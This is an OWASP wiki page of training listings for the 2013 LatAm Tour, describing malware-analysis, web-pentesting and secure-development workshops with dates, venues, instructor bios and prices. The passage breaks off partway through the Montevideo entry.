OWASP - User contributions [en]

LatamTour2013 CUR Agenda

2013-03-20T15:00:54Z

Wagner.elias:

LatamTour2013 CUR Agenda

2013-03-19T16:08:43Z

Wagner.elias:

LatamTour2013 CUR Agenda

2013-03-13T00:20:23Z

Wagner.elias:

LatamTour2013 CUR Agenda

2013-03-13T00:12:03Z

Wagner.elias:

LatamTour2013 Training

2013-03-11T12:22:06Z

Wagner.elias:

<noinclude>{{:LatamTour2013 header}}</noinclude>

{|style="vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;" align="center" cellspacing="5"
|-
| align="center" height="30" style="background:#CCCCEE;" colspan="2" | '''OWASP LATAM TOUR 2013'''
|-
| align="center" style="background:#EEEEEE;" colspan="2" | '''ENTRENAMIENTOS EN LATINOAMERICA'''
| valign="left" height="80" bgcolor="#EEEEEE" align="left" colspan="2" |
|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''CHILE-SANTIAGO'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Lunes 18 de marzo de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | Alonso de Ovalle 1586, Santiago Centro
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Pablo_ramos.PNG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Análisis de malware: métodos y técnicas”'''<br><br>Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.

El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.

'''Perﬁl del orador'''

Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.

Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingmalware HAGA CLIC AQUI!]'''<br>
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Noimagen.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Penetration Testing Web”'''

Scripting para Pentesting Web, desarrollo de casos reales de automatización de ataques, trabajo con sesiones, explotación de sql injection.

Si alguna vez pensaste cuando estabas haciendo una Pentesting cómo no hay una herramienta para hacer esto, este es el curso que deseas participar! Este curso te explicará el protocolo HTTP, su estructura y cómo interactúa con los navegadores, y luego haremos una introducción al lenguaje de programación Python y explicar cómo se puede usar para interactuar con páginas, administrar sesiones, automatizar procesos, analizar el uso expresiones regulares y realizar comprobaciones basadas en la guía de pruebas de OWASP. Con todo este conocimiento adquirido, desarrollaremos pequeñas herramientas para necesidades específicas.

'''Perfil del orador:''' Ricardo Supo
OWASP - Perú Chapter Colider
CTO at Consultoría LimaSoft SAC
CTO at INZAFE SAC
10+ años de experiencia en pentesting y desarrollo de software

'''Prerequisitos:'''

El participante deberá llevar un computador con al menos 4 GB en RAM, 100GB en disco libre para máquinas virtuales y preinstalado VMWare Player.

'''Duración:''' 4 horas (horario mañana 9AM-1PM)

'''Precio:''' U$S95 No miembros / U$S45 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingpentest1 HAGA CLIC AQUI!]'''<br>

|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Noimagen.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Penetration Testing Web”'''

Scripting para Pentesting Web, desarrollo de casos reales de automatización de ataques, trabajo con sesiones, explotación de sql injection.

Si alguna vez pensaste cuando estabas haciendo una Pentesting cómo no hay una herramienta para hacer esto, este es el curso que deseas participar! Este curso te explicará el protocolo HTTP, su estructura y cómo interactúa con los navegadores, y luego haremos una introducción al lenguaje de programación Python y explicar cómo se puede usar para interactuar con páginas, administrar sesiones, automatizar procesos, analizar el uso expresiones regulares y realizar comprobaciones basadas en la guía de pruebas de OWASP. Con todo este conocimiento adquirido, desarrollaremos pequeñas herramientas para necesidades específicas.

'''Perfil del orador:''' Ricardo Supo
OWASP - Perú Chapter Colider
CTO at Consultoría LimaSoft SAC
CTO at INZAFE SAC
10+ años de experiencia en pentesting y desarrollo de software

'''Prerequisitos:'''

El participante deberá llevar un computador con al menos 4 GB en RAM, 100GB en disco libre para máquinas virtuales y preinstalado VMWare Player.

'''Duración:''' 4 horas (horario tarde 2PM-6PM)

'''Precio:''' U$S95 No miembros / U$S45 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13scltrainingpentest2 HAGA CLIC AQUI!]'''<br>

|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''Brasil-Curitiba'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Data'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Local'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | 25 de Março
| valign="middle" bgcolor="#dbdbf3" align="left" | UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Noimagen.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Introdução a segurança de aplicações'''

'''Objetivo'''

Obter o conhecimento necessário para auditar a segurança de aplicações web e aprender a proteger e resolver estes problemas.

'''Descripción'''

Este treinamento irá ajudá-lo a ganhar habilidades sobre como avaliar, entender as vulnerabilidades de segurança de uma aplicação web e aprender a lidar com estas falhas de segurança para que eles nunca possam ser exploradas por um hacker. Este curso intensivo de um dia incide sobre os mais comuns problemas de aplicações web de segurança, incluindo aspectos do OWASP Top Ten (2010).

Hands on: Os estudantes vão participar de uma série de exercícios práticos de segurança de testes onde eles atacam uma aplicação web ao vivo (ou seja, WebGoat) que foi semeado com vulnerabilidades de aplicativos comuns da web e, em seguida, usar ferramentas de proxy (ou seja, WebScarab) para completar os exercícios.

Requisitos: Notebook/desktop com VMware/VMplayer instalado, pois será utilizada uma imagem de máquina virtual disponibilizada pelo instrutor.

'''Audiencia'''

Estudantes e profissionais que desejam aprender mais sobre segurança em aplicações web.

'''Nivel:''' Iniciante

'''Perfil do Instrutor:''' Wagner Elias

Wagner Elias tem ampla experiência na condução de projetos em IT Security com projetos desenvolvidos em empresas dos mais diversos segmentos. É fundador do capítulo brasileiro da OWASP (Open Web Application Security Project); ocupou o cargo de diretor de conteúdo na gestão 2006-2008 e de eventos da gestão 2008-2010 do capítulo brasileiro da ISSA (Information System Security Association). É co-fundador e sócio da Conviso Application Security, onde atua como CTO (Chief Technical Officer), responsável pela gestão de pesquisa e desenvolvimento de projetos de consultoria em segurança de aplicações.

'''Duração:''' 8 horas

'''Preço:''' U$S300 Não membros / U$S250 Membros OWASP.

'''Para mais informações e preço''': [- Click aqui!]'''<br>
|-

|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''COSTA RICA - SAN JOSE'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Lunes 18 de marzo de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | Fundación Omar Dengo - Barrio Francisco Peralta, Avenidas 10 y 12 - Calle 25 - San Jose
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Rpulgar.JPG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: Penetration Testing de Aplicaciones Web'''
<br>
Las pruebas de intrusión a aplicaciones web son auditorías de seguridad en las que el penetration tester actúa como lo haría un posible atacante, pero con autorización; con el objetivo de analizar, encontrar y explotar vulnerabilidades de aplicaciones web corporativas.
El curso se basará en el OWASP Top 10 y en OWASP Testing Guide, como marcos de referencia para realizar todo el proceso de pentest de aplicaciones web.

'''Perﬁl del orador'''
Ramiro Pulgar es Pentester e Investigador Forense de Blue Hat Consultores con mas de 12 años de experiencia en el campo de IT y seguridad informática, quien ha liderado y desarrollado proyectos en Ecuador y Colombia. También se ha desarrollado como instructor certificado EC-Council en varios países de Latinoamerica. Dentro de sus certificaciones se encuentra: LPT, CEI, CHFI, ECSA, CEH, ENSA, ECIH, RHCE, CCA, CCSE.

Fundó el capítulo OWASP en Ecuador en el año 2010, y se ha desarrollado como líder y concientizador de OWASP, tanto a nivel comunitario, universitario, corporativo y gubernamental en Latinoamerica.

'''Prerequisitos:'''

Una laptop con mínimo 4GB en RAM y 120GB de espacio en disco disponible.

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13sjotraining HAGA CLIC AQUI!]'''<br>
|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''BOGOTA - COLOMBIA'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Miercoles 20 de Marzo de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | Universidad Javeriana. Edificio Fernando Barón Sala 2-309
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Pablo_ramos.PNG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Análisis de malware: métodos y técnicas”'''<br><br>Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.

El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.

'''Perﬁl del orador'''

Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.

Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13bogtrainingmalware HAGA CLIC AQUI!]'''<br>
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Dragonjar.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller Practico De Seguridad Web'''

'''Objetivo'''

Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.

'''Descripción'''

En este taller altamente practico descubriremos cuales son las Vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar que estos dispositivos sean vulnerables a estos Fallos.

'''Audiencia'''

Estudiantes o profesionales del campo de la informática con deseos Aumentar sus conocimientos y aprender a evaluar la seguridad de las Aplicaciones web.

'''Nivel:''' Medio

'''Perfil del Orador:''' Jaime Andrés Restrepo Gomez

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales.
Consultor Independiente de Seguridad Informática con más de 6 años de experiencias en Ethical Hacking, Pen Testing y Análisis de Vulnerabilidades. Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Ha sido Speaker en diferentes eventos de Seguridad (EKO Party en Argentina, iSummit en Ecuador, Campus Party, Encuentro Internacional de Seguridad informÃ¡tica, Congreso de Hacking ético, SegurINFO, entre muchos otros) y miembro del Comité Organizador del Encuentro Internacional de Seguridad informática.

'''Duracion:''' 8 horas

'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13bogtrainingpentest HAGA CLIC AQUI!]'''<br>
|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''CARACAS - VENEZUELA'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Sabado 23 de marzo de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | UCV - Universidad Central de Venezuela - Facultad de Ciencias - Salones de la Facultad
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Pablo_ramos.PNG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Análisis de malware: métodos y técnicas”'''<br><br>Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.

El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.

'''Perﬁl del orador'''

Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.

Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.

'''Duracion:''' 8 horas

'''Precio:''' Para No miembros 1250 Bs/200 UDS | Para Estudiantes y Miembros de Owasp 945 Bs/150 UDS <Br>. Existen también descuentos para grupos.

'''NOTA IMPORTANTE''': El precio expresado en Bolívares es netamente referencial, el débito se cargara a su Tarjeta de Crédito en Dolares Americanos UDS, Es imprescindible utilizar la tarjeta asociada a su cupo CADIVI para realizar el pago.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13ccstrainingmalware HAGA CLIC AQUI!]'''<br>
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Rubenrec.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “ Introducción al Pentest”'''<br><br>

'''Objetivo'''

Curso de Introduccion a realización de Auditorías, orientado a todos los profesionales con conocimientos generales de Seguridad Informática que deseen introducirse en las metodologías de los tests de penetracion. Dirigido a: Profesionales con conocimientos generales de seguridad informática que deseen introducirse en las metodologías de realización de Tests de Intrusión

'''Descripción'''

En este taller altamente practico y se incluirán temas como:

> Etapas en los Test de Penetración (Reconocimiento y enumeración, análisis y explotación)
> Pruebas de penetración a aplicaciones web
> Pruebas de penetración en redes locales
> Creación de exploits básicos y técnicas de explotación

'''Audiencia'''

Dirigido a: Estudiantes y Profesionales con conocimientos generales de seguridad informática que deseen introducirse en las metodologías de realización de Tests de penetración.

'''Nivel:''' Medio

'''Perﬁl del orador'''
Rubén Recabarren

Egresado con honores de la Universidad de Michigan, Ann Arbor, con triple licenciatura en Biofísica, Bioquímica y Matemática Pura. Egresado también con honores de la Universidad Simón Bolívar como Ingeniero de la Computación. Adicionalmente, posee más de 10 certificaciones internacionales en diversas especialidades de la seguridad informática como manejo de incidentes, análisis forense y pruebas de penetración.

Rubén Recabarren es una de las 3 únicas personas en el mundo en haber alcanzado las más altas certificaciones de seguridad informática: ISSAP y GSE que confieren dos de las organizaciones más importantes del área a nivel global: ISC2 y GIAC respectivamente. Actualmente trabaja como consultor de arquitectura de seguridad informática especializado en pruebas de penetración y criptografía, adicional a esto es Mentor local de SANS y escribe preguntas para los exámenes de certificación de la GIAC

'''Duracion:''' 8 horas

'''Precio:''' Para No miembros 1250 Bs/200 UDS | Para Estudiantes y Miembros de Owasp 945 Bs/150 UDS <Br>. Existen también descuentos para grupos.

'''NOTA IMPORTANTE''': El precio expresado en Bolívares es netamente referencial, el débito se cargara a su Tarjeta de Crédito en Dolares Americanos UDS, Es imprescindible utilizar la tarjeta asociada a su cupo CADIVI para realizar el pago.

'''Para mayor información y registro''': [http://www.regonline.com/owasplatamtour13ccstrainingpentest HAGA CLIC AQUI!]'''<br>
|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''LIMA - PERU'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Lunes 25 de marzo de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | Escuela de Postgrado - Universidad Tecnológica del Perú (UTP). Av. Salaverry 2443 - San Isidro
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Pablo_ramos.PNG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Análisis de malware: métodos y técnicas”'''<br><br>Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.

El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.

'''Perﬁl del orador'''

Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.

Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.

'''Duracion:''' 8 horas

'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13limtrainingmalware HAGA CLIC AQUI!]'''<br>
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Dragonjar.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller Practico De Seguridad Web'''

'''Objetivo'''

Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.

'''Descripción'''

En este taller altamente practico descubriremos cuales son las Vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar que estos dispositivos sean vulnerables a estos Fallos.

'''Audiencia'''

Estudiantes o profesionales del campo de la informática con deseos Aumentar sus conocimientos y aprender a evaluar la seguridad de las Aplicaciones web.

'''Nivel:''' Medio

'''Perfil del Orador:''' Jaime Andrés Restrepo Gomez

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales.
Consultor Independiente de Seguridad Informática con más de 6 años de experiencias en Ethical Hacking, Pen Testing y Análisis de Vulnerabilidades. Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.

Ha sido Speaker en diferentes eventos de Seguridad (EKO Party en Argentina, iSummit en Ecuador, Campus Party, Encuentro Internacional de Seguridad informÃ¡tica, Congreso de Hacking ético, SegurINFO, entre muchos otros) y miembro del Comité Organizador del Encuentro Internacional de Seguridad informática.

'''Duracion:''' 8 horas

'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13limtrainingpentest HAGA CLIC AQUI!]'''<br>

|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Cerullof.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''<br><br>

Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.

'''Perﬁl del orador'''

Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.<br>
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.<br>

'''Duracion:''' 8 horas

'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13limtrainingesapi HAGA CLIC AQUI!]'''<br>

|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''QUITO - ECUADOR'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Miercoles 27 de marzo de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | UTPL - Universidad Tecnica Particular de Loja - Sede Quito | Av. 6 de Diciembre Nº 31-47 y Alpallana
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Pablo_ramos.PNG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: “Análisis de malware: métodos y técnicas”'''<br><br>Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.

El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.
<br><br>
'''Perﬁl del orador'''
<br><br>
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.

Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.

'''Duracion:''' 8 horas

'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13uiotrainingmalware HAGA CLIC AQUI!]'''<br>
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Cerullof.jpg|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''<br><br>

Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.

'''Perﬁl del orador'''

Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.<br>
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.<br>

'''Duracion:''' 8 horas

'''Precio:''' U$S200 No miembros / U$150 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13uiotraining2 HAGA CLIC AQUI!]'''<br>

|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Rpulgar.JPG|150px]]
| valign="middle" bgcolor="#EEEEEE" align="left" | '''Taller: Penetration Testing de Aplicaciones Web'''
<br>
Las pruebas de intrusión a aplicaciones web son auditorías de seguridad en las que el penetration tester actúa como lo haría un posible atacante, pero con autorización; con el objetivo de analizar, encontrar y explotar vulnerabilidades de aplicaciones web corporativas.
El curso se basará en el OWASP Top 10 y en OWASP Testing Guide, como marcos de referencia para realizar todo el proceso de pentest de aplicaciones web.

'''Perﬁl del orador'''

Ramiro Pulgar es Pentester e Investigador Forense de Blue Hat Consultores con mas de 12 años de experiencia en el campo de IT y seguridad informática, quien ha liderado y desarrollado proyectos en Ecuador y Colombia. También se ha desarrollado como instructor certificado EC-Council en varios países de Latinoamerica. Dentro de sus certificaciones se encuentra: LPT, CEI, CHFI, ECSA, CEH, ENSA, ECIH, RHCE, CCA, CCSE.

Fundó el capítulo OWASP en Ecuador en el año 2010, y se ha desarrollado como líder y concientizador de OWASP, tanto a nivel comunitario, universitario, corporativo y gubernamental en Latinoamerica.

'''Prerequisitos:'''

Una laptop con mínimo 4GB en RAM y 120GB de espacio en disco disponible.

'''Duracion:''' 8 horas

'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.

'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13uiotraining1 HAGA CLIC AQUI!]'''<br>

|-
| align="center" style="background: #4B0082;" colspan="2" | <span style="color:#ffffff">'''MONTEVIDEO - URUGUAY'''</span>
|-
| style="width:20%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Fecha'''
| style="width:80%" valign="middle" bgcolor="#CCCCEE" align="center" colspan="0" | '''Lugar'''
|-
| valign="middle" bgcolor="#dbdbf3" align="center" | Martes 2 de abril de 2013
| valign="middle" bgcolor="#dbdbf3" align="left" | Universidad Catolica del Uruguay
|-
| valign="middle" bgcolor="#EEEEEE" align="center" | [[Image:Cerullof.jpg|150px]]
